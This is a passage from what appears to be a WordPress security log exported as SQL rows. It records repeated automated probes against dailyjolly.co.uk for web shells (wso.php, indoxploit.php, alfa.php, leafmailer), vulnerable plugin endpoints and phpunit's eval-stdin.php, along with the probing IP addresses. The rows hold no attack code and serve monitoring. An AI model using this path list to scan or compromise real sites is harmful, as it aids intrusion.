.36.78',351544398,'',0,1674059140.9389,55,'eOpWqtbQmJEPagoDRC0j6FK2','','19|0|0|0|www.dailyjolly.co.uk/1337.php',0,19,0),('20.244.36.78',351544398,'',0,1674059142.1232,55,'lrWwx1zAig9oD8nqBLjkKYUQ','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1674059143.2986,55,'r9b80KDUy6mFZeWC3q1T4awn','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('20.244.36.78',351544398,'',0,1674059144.7179,55,'1uQNn0UOpv2lFLSxB7t5JhZC','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1674059145.8983,55,'BNcTESskR6vOh5Dxp7nCLeZd','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1674059147.1832,55,'s9ZOifaWjPoh1lGE2K0qMJmw','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1674059148.3530,55,'Pqi6xBEQ4XVnt7N1vDcg9R25','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('20.244.36.78',351544398,'',0,1674059149.5508,55,'UQfeDNmthun6bCKAaRr34ixW','','19|0|0|0|www.dailyjolly.co.uk/gaza.php',0,19,0),('20.244.36.78',351544398,'',0,1674059150.9301,55,'UQJ5sgxKXRb7EmYc4jaOGuNW','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('20.244.36.78',351544398,'',0,1674059152.1189,55,'xXoKQb9kpr3gdVwiT4Ey5sYW','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('20.244.36.78',351544398,'',0,1674059153.3236,55,'JGkPsQFtL9qf4yRNoh8aUwZM','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('20.244.36.78',351544398,'',0,1674059154.5277,55,'30piTAaYxlcGtJ2E8vgkMNUd','','19|0|0|0|www.dailyjolly.co.uk/wso1.php',0,19,0),('20.244.36.78',351544398,'',0,1674059155.6162,55,'ZcLv5iUfFukMgq1leDKpjJA3','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1674059156.7176,55,'8e5sAt0GpcnofV2WhXkxZY7v','','19|0|0|0|www.dailyjolly.co.uk/Lux.php',0,19,0),('20.244.36.78',351544398,'',0,1674059157.9727,55,'wI6fCsX3ObNHe9Ki4AraUmqL','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('173.255.223.188',2919227324,'',0,1674061175.8553,55,'CNJDQFlxPuB1OX2HVM3z9pmY','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('165.22.114.45',2769711661,'',0,1674062492.6682,55,'jwDmdLAFyERvGp8oTnX5WYPr','','19|0|0|0|dailyjolly.co.uk/wp-content/admin.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063578.7876,55,'x1feXmiqTosrF5DRNtcghCku','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063580.4901,55,'0MgWOBRjSn5cLk6FzCAamqH2','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063582.4812,55,'QLGJegREAZxvl03kipzb9841','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063583.6860,55,'9gXI5eKBWdutAm8l4iFcpbQq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063585.8339,55,'4qbT2spkg1cJ0EiQZ7ouO538','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063585.8662,10,'4qbT2spkg1cJ0EiQZ7ouO538','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('208.109.33.169',3496812969,'',0,1674063587.7152,100,'xfB4IFug281bQ5kMDGATVUcm','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('208.109.33.169',3496812969,'',0,1674063590.9041,55,'V3hwpBUPc1De7J9WfQnZMuXl','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063592.0854,55,'ft0De4WY8amMU2wIHoGKQyTv','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063593.2100,55,'RMqO9kam7x2eAzQdvc5fh38I','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063595.6009,55,'9U3iBO62KTtqQzCLo1xWlAaV','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063596.8481,55,'HFKoCQYlNy1rAb4LpvXf2Rdh','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063600.9323,55,'7pkYEmPn8sg1r53XVh0TqBSH','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063602.4589,55,'uJyntzwcBr46x9FjY0KAev5E','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063603.7304,55,'ZScK3s5m6lx4pzndu7L1fCvW','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063604.9766,55,'YygfKHlAGNrznPqjtV7sCwxp','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063606.1434,55,'r6xnjBp3MSaHzAIbKRlUmVJL','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063607.3709,55,'tXki7jYgdp6rSmLKZHBGDvwo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063608.9408,55,'RGlYb0PxFtwTNoKfJuCjrkQ1','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063610.4828,55,'JmlZbTn7QOqVGy60gHjNkM9F','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063611.6431,55,'MluLBfeVd0NSw4DmQctE89qR','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063612.7546,55,'WCBlpJNQeDF3mRjZ5s0yAVoq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('208.109.33.169',3496812969,'',0,1674063614.7237,55,'LT9pQZblMztFsBOXDJdo6Ix2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('165.22.114.45',2769711661,'',0,1674065567.9013,55,'kuHf7xpY82olvBUqKzN3A9Ea','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('208.109.33.169',3496812969,'',0,1674073524.6994,55,'MqC0RiamePjOSIdgwWrVK5zD','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079008.3107,55,'cewt1QAyY7piN6MlKGjLqgO8','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079009.6175,55,'Cs5GdI6EFNgZiO8kYe2vBDfh','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079011.0431,55,'JXC75kTbAceDxZlr2tIQUz9o','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079012.8951,55,'PoEwIeJuCU2bhxHzQ0Kpk34A','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079014.0345,55,'e6QqkYvJ32Vaoh9Cdj7NtHfP','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079014.1050,10,'e6QqkYvJ32Vaoh9Cdj7NtHfP','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('208.109.33.169',3496812969,'',0,1674079015.4441,100,'OTwzEaG9HfAhjJy2nq0XviPI','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('208.109.33.169',3496812969,'',0,1674079018.1118,55,'9y3fGxjpAdX2lYQSZI5suPBe','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079019.1847,55,'LXFxn9S4fKR6j3O0MEBlPoId','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079020.3792,55,'gmrfyNkHOpju0v15IeSnbhdR','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079022.8996,55,'Ir2L7Y6nkTHvMd31zK8NZ4hE','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079024.1264,55,'gSetqKavQimOfCMYJxkA150E','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079027.5116,55,'StTCK9Fpbzr4cLZB7PaWXGhi','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079029.0316,55,'EreTyDSRQ69pCkYnzwW2dINt','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079030.5282,55,'3LgEtuQdBSqHNlCoAa2zfX4h','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079031.6001,55,'mUtpYZ6IeanGBNS058HADiso','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079033.5917,55,'3oxeXYpVbtR9Dzr28L1Smv6B','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079034.7114,55,'TVFipmqZCghvO4ASY8kso7PM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079035.8266,55,'YVeuNWB4lOvQIfptsijGqbFR','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079037.0282,55,'B5AqpdJG74lFeEV1xC6YwasQ','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079038.1241,55,'FRNHWpuMlDEZ7A6hCtQrysL0','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079039.1948,55,'BA6u7QK2CFapXWks5jTI39zx','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('208.109.33.169',3496812969,'',0,1674079040.2742,55,'QBXW4lZsvtjkMf7TaVr5eUgi','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('109.248.175.119',1845014391,'',0,1674083049.3772,55,'zE7iZIwBg2FG8DedrvlcVSkA','','19|0|0|0|www.dailyjolly.co.uk/wso112233.php',0,19,0),('20.244.36.78',351544398,'',0,1674085148.4564,55,'vQW5rY9hAogH2c47y3L1xiVz','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1674085152.4061,55,'ScFx4JOZ3m1NbsHd5UnaKXDV','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.244.36.78',351544398,'',0,1674085153.9256,55,'9MWxRYInOKLQct50jh4DEXF7','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.244.36.78',351544398,'',0,1674085160.6307,55,'YEwvIxUV5qDChWXO68Kso2GS','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.244.36.78',351544398,'',0,1674085161.3911,55,'LpdHm2FAVKjzvUgqn04Qb5y3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.244.36.78',351544398,'',0,1674085161.4088,10,'LpdHm2FAVKjzvUgqn04Qb5y3','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.244.36.78',351544398,'',0,1674085164.4705,55,'2SAsQHLlkocNUfdX5ajn8VmC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.244.36.78',351544398,'',0,1674085165.9463,55,'HNoPpt7ci0Ajm69K5qeB8EJy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.244.36.78',351544398,'',0,1674085166.6280,55,'4Jw2pIBtfCqb851XMdmVsgio','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.244.36.78',351544398,'',0,1674085168.5219,55,'Uc6QzKZ7928Lp5GkSyjWBd4O','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674085170.0993,55,'FzwB0kDJm6f1TqheO8CNXLc5','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.244.36.78',351544398,'',0,1674085182.8705,100,'DTAlgCqr6kM7fYLREFS4jBcz','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.244.36.78',351544398,'',0,1674085189.7386,55,'ZRHTA6YSOMnKQrxw9pWcfXbd','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.244.36.78',351544398,'',0,1674085191.1465,55,'Dce5EOmBrRAxJWQhy3t6NF2k','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085700.7494,55,'PUV34t0g6mxLW8sfBocjiKIA','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085702.9735,55,'ydL5iqTb0PQMf7CUErnHpVNa','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085704.4768,55,'9M0bl1NTn6K7Q8a5pDm2dwHG','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085707.1918,55,'uvolZUmaing8jhsXEq4Yy6tS','','19|0|0|0|www.dailyjolly.co.uk/C.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085709.7295,55,'lw2JC5KkXnS9WqPxcTyYrQuh','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085709.7673,10,'lw2JC5KkXnS9WqPxcTyYrQuh','','707|0|0|0|www.dailyjolly.co.uk/c.php',0,707,0),('173.255.223.188',2919227324,'',0,1674085711.8346,55,'YnXpCb8LlIcdmWfV1oTAZRgD','','19|0|0|0|www.dailyjolly.co.uk/01.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085714.0907,55,'sAti1jp2cuCYxfMgkIUT8NvG','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085716.3547,55,'Y0UGm6ucwznTikFAHRXtaKv2','','19|0|0|0|www.dailyjolly.co.uk/02.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085719.0618,55,'3mJ8qhlO5XBF2yoAiE1Cd7gs','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085721.1578,55,'Yu7EeCmOcbVrg8oT1xsqB4Fi','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085722.9822,55,'br6VJSLeP0iDdoYmGhv35X7w','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085725.2637,55,'nEZpTBPrd58tkN7iVKQgq2yR','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085726.9226,55,'pqbwnRPda9A1gt8UOYSN05xc','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085728.8145,55,'gt67cL0XY3asJDVp4HkGQA18','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085731.0625,55,'osYqDCU1GpjrulA5ni9ZQJTv','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085733.1814,55,'NayG0tsJgbSZBkoTn1FxvKer','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085735.1540,55,'kbB5cw6jSutoWqNLGIvHQfFa','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085737.4220,55,'unQPTJZpMlF5OsL74fzcSN69','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085739.6707,55,'RyEscAiF5Gq710X8BKLrtYwn','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085741.5002,55,'KMxU3VkI56GtbrqcwLTJ8f91','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085743.7549,55,'g43FuSK2Px5wo8D6Wz1nOTJI','','19|0|0|0|www.dailyjolly.co.uk/good.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085745.8345,55,'0QOaT68S1Irvw4XtxYBE2Wlg','','19|0|0|0|www.dailyjolly.co.uk/classes.php',0,19,0),('173.255.223.188',2919227324,'',0,1674085747.7578,55,'UYqTftrxoQlG03RKPVsD97j1','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('135.181.141.142',2276822414,'',0,1674091267.0795,55,'951GIoj8DnpbBmRkhV2dcTN4','','19|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,19,0),('188.241.82.13',3169931789,'',0,1674094344.1833,55,'L5VoScRdIWEpNt2lBreTxuk4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/_input_3_raiz0.php5',0,19,0),('188.241.82.13',3169931789,'',0,1674094364.0250,55,'ziEONBCV4vMtRTcfuA5Yb7gh','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/revslider/temp/update_extract/Raiz0__fudmv.php',0,19,0),('188.241.82.13',3169931789,'',0,1674094375.9242,55,'KZtGsWO62h0J4VIYiC9SdcB1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/showbiz/temp/update_extract/Raiz0__fudmv.php',0,19,0),('188.241.82.13',3169931789,'',0,1674094409.0857,55,'51zifTSoMgrtuvPWd6Hy2LFI','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('188.241.82.13',3169931789,'',0,1674094443.7202,55,'lf8IJx54F0wAhGkuNM7bztjX','','19|0|0|0|www.dailyjolly.co.uk/components/Raiz0WorM_1674092839.php',0,19,0),('188.241.82.13',3169931789,'',0,1674094443.7482,10,'lf8IJx54F0wAhGkuNM7bztjX','','707|0|0|0|www.dailyjolly.co.uk/components/Raiz0WorM_1674092839.php',0,707,0),('188.241.82.13',3169931789,'',0,1674094469.0259,55,'JTtQOy1UKerW0D2fNH7pmzlR','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/assignments/Raiz0_1674092839.php.',0,19,0),('20.14.84.163',336483491,'',0,1674094912.4581,55,'8OWZAT7Rot5LYBVJr0yzfnX1','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('135.181.141.142',2276822414,'',0,1674100053.2841,55,'0hYO9VwP6nN5lopuT8C3iGrz','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('135.181.141.142',2276822414,'',0,1674100054.3666,55,'M2ZHmYXcjEwlNTGRp8Whq1uA','','19|0|0|0|dailyjolly.co.uk/.wp-back.phP',0,19,0),('135.181.141.142',2276822414,'',0,1674100054.9240,55,'tUhB1kJe0cbarCKixsV7DpQY','','19|0|0|0|dailyjolly.co.uk/bala.php',0,19,0),('135.181.141.142',2276822414,'',0,1674100055.5193,55,'LQo8cUZg1DpCNG6MnXibtkS0','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('109.248.175.119',1845014391,'',0,1674100300.7340,55,'YKlIj9Um5dNnZtMXEPicH2Lw','','19|0|0|0|www.dailyjolly.co.uk/zet.php',0,19,0),('20.14.84.163',336483491,'',0,1674107725.4355,55,'UWn2ctIgfOT1RM8pod6qyxLN','','19|0|0|0|www.dailyjolly.co.uk/.sts.php',0,19,0),('20.14.84.163',336483491,'',0,1674107927.3213,55,'FCHGpvJzQfYX5gRWxbm3rU17','','19|0|0|0|www.dailyjolly.co.uk/.Wp-back.phP',0,19,0),('20.14.84.163',336483491,'',0,1674108082.0020,55,'Vwxt7mMaC8g30XiUH5OvlKey','','19|0|0|0|www.dailyjolly.co.uk/fx.php',0,19,0),('20.14.84.163',336483491,'',0,1674108184.6974,55,'tmehuG4LNZoUSXgTrB5Pbv9w','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('20.14.84.163',336483491,'',0,1674108275.7008,55,'iQ57KZouY2yFTxnwa6erlD0J','','19|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,19,0),('20.14.84.163',336483491,'',0,1674108275.7453,10,'iQ57KZouY2yFTxnwa6erlD0J','','707|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,707,0),('20.14.84.163',336483491,'',0,1674108320.3606,55,'USfKEVjgbvdqw2ZArm0ou39y','','19|0|0|0|www.dailyjolly.co.uk/wso112233.php',0,19,0),('20.14.84.163',336483491,'',0,1674108348.7516,55,'aEqft7SWIbeYD5N1wjPK9ukc','','19|0|0|0|www.dailyjolly.co.uk/bala.php',0,19,0),('20.14.84.163',336483491,'',0,1674108390.2949,55,'NHbI4cMAlhGD9X3K5FRmiOzs','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('20.14.84.163',336483491,'',0,1674108445.1052,55,'JUp9jEKQVr3TuRqkwW0v45AH','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.14.84.163',336483491,'',0,1674108527.7922,55,'SeyDA2WvGjJlwoYtkL8VCmRp','','19|0|0|0|www.dailyjolly.co.uk/wp-class.php',0,19,0),('20.14.84.163',336483491,'',0,1674108628.1404,55,'1GNnzFM3yqrglR6KB5ujoSJL','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.14.84.163',336483491,'',0,1674108711.2648,55,'HNSBUyQ3d0gb4vOpDZ2tMm5L','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('20.14.84.163',336483491,'',0,1674108817.1915,55,'phuZGoSX7I04kTfNztaDBAVE','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.14.84.163',336483491,'',0,1674108924.6043,55,'Lbf8JqS1r0KzI9WN2wpRnUPt','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.14.84.163',336483491,'',0,1674109048.3433,55,'iIXRCmeSPThZ31vbA5UMpnLY','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109083.0665,55,'k6Bi94fyEI3qaTLoUY8GnPsO','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109083.5239,55,'tGzF2Z8joUIiJNfyp6mVBcsK','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109083.9638,55,'1A3Np0hvZgV8ebcW4tLHPD6m','','19|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109084.4984,55,'NDxXsyecdk8OUuA0IFhtlWKV','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109084.9604,55,'DNTC5d4wbSIa3vmKHtlsEMV2','','19|0|0|0|dailyjolly.co.uk/fx.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109084.9970,10,'DNTC5d4wbSIa3vmKHtlsEMV2','','707|0|0|0|dailyjolly.co.uk/fx.php',0,707,0),('135.181.141.142',2276822414,'',0,1674109085.4280,55,'EqZ6VXekTY2APnsFuJQ517Ot','','19|0|0|0|dailyjolly.co.uk/wp-content/fx.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109085.8835,55,'ICjXZJzk8rpnlRFxW2yNAtDw','','19|0|0|0|dailyjolly.co.uk/wp-admin/fx.php',0,19,0),('135.181.141.142',2276822414,'',0,1674109086.5091,55,'NQTI6Bb01rzfMolRKenLY7wp','','19|0|0|0|dailyjolly.co.uk/wp-includes/fx.php',0,19,0),('20.14.84.163',336483491,'',0,1674109188.6081,55,'I28t1m6iTzRAUEeY49BpQL0w','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.14.84.163',336483491,'',0,1674109302.8190,55,'w95NhbtkqgaOBrCU81VPRJdQ','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.14.84.163',336483491,'',0,1674109423.4836,55,'20iu4Q9bdmvfFOMwGVDznLJh','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.14.84.163',336483491,'',0,1674109544.9296,55,'8fWTASskhdZCU6JOw3lE05at','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.14.84.163',336483491,'',0,1674109647.2288,55,'uLVIxiaOc0sfPRlqHn2eYpBw','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.14.84.163',336483491,'',0,1674109773.6495,55,'y0fxX4cAKNda8521noz9uMJD','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.14.84.163',336483491,'',0,1674109842.4794,55,'F3kJ9HwUqTgfLxc4SORM2mN1','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.14.84.163',336483491,'',0,1674109897.1116,55,'RdDA1ZvpPCrhWEfMeut8IQ9S','','19|0|0|0|www.dailyjolly.co.uk/confiig.php',0,19,0),('109.248.175.119',1845014391,'',0,1674117393.0867,55,'mtYA0dDcW9vsS5VJIGyOBq34','','19|0|0|0|www.dailyjolly.co.uk/xleet-shell.php',0,19,0),('20.14.84.163',336483491,'',0,1674118953.6482,55,'2YxbLrkovcyAOfWjqCpiUtJX','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674118954.6459,55,'7sBFilRUn6z0Cyce2fTbKvVE','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118955.5804,55,'AqKDFmdQ84O9aLn6lZzVHbpM','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118956.5182,55,'PgmNtI6Cc9ZGdRjbLzUruSnT','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674118957.5029,55,'ziv2XD6mjLF1qWVafHrOeYIM','','19|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118957.5386,10,'ziv2XD6mjLF1qWVafHrOeYIM','','707|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,707,0),('20.14.84.163',336483491,'',0,1674118958.4925,55,'RXVFATKNDUPJn9cMkZCeQLxH','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674118959.4465,55,'2FEQjGUJTgdbxlL4c5MzPCWk','','19|0|0|0|www.dailyjolly.co.uk/wp-content/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674118960.4549,55,'AcCuzrHjVm5IOqv0QXiW9hoS','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674118961.4117,55,'nWMiAsbdlVQOhuFNZc36kGvJ','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674118962.3633,55,'x2Cucw7eHBK5NAnbfMUpyQsZ','','19|0|0|0|www.dailyjolly.co.uk/leaf-mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674118963.2818,55,'cGn2shIwK8e1NTgMpmyBX7ba','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674118964.2352,55,'S67ci2XHM03smIbDBAkv58YK','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer.php',0,19,